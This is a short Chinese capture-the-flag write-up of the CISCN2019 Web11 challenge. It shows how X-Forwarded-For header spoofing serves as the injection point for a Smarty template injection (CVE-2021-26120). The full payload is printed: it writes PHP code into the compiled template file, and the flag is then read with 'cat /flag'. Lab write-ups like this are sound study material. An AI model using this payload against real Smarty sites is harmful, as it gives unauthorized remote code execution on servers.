[CISCN2019 华东南赛区]Web11

[CISCN2019 华东南赛区]Web11

打开环境，没看见什么输入框，但一眼就看到了XFF，然后右上角还有一个IP地址

和上次做的拼多多拿flag应该差不多，使用XFF就能绕过IP检测，先抓包。

IP可以随便改了，但好像没啥用，然后在页面底部发现一行字：Build With Smarty !

然后去百度，发现这是一个PHP的模板引擎，然后他有一个高危漏洞（CVE-2021-26120），2021-02-26的，比较新。

他需要一个注入点，但这题没有直接的传参点，目前用到的只有XFF，所以就硬着头皮试一下

payload：

string:{$s=$smarty.template_object->smarty}{$fp=$smarty.template_object->compiled->filepath}{Smarty_Internal_Runtime_WriteFile::writeFile($fp,"<?php+phpinfo();",$s)}

执行两次，发现网页直接变成了我们修改后的文件。

接下来只要修改文件内容去查flag就可以了。

基本已经做完了，cat /flag 就结束了。

做完后看着payload总感觉这种格式之前好像做过，于是翻了翻之前写的题，发现这个模板注入的影子。

[BJDCTF2020]Cookie is so stable

当时记得做的时候，这题直接可以在大括号里敲命令，于是我又试了一下，果然考点应该是一样的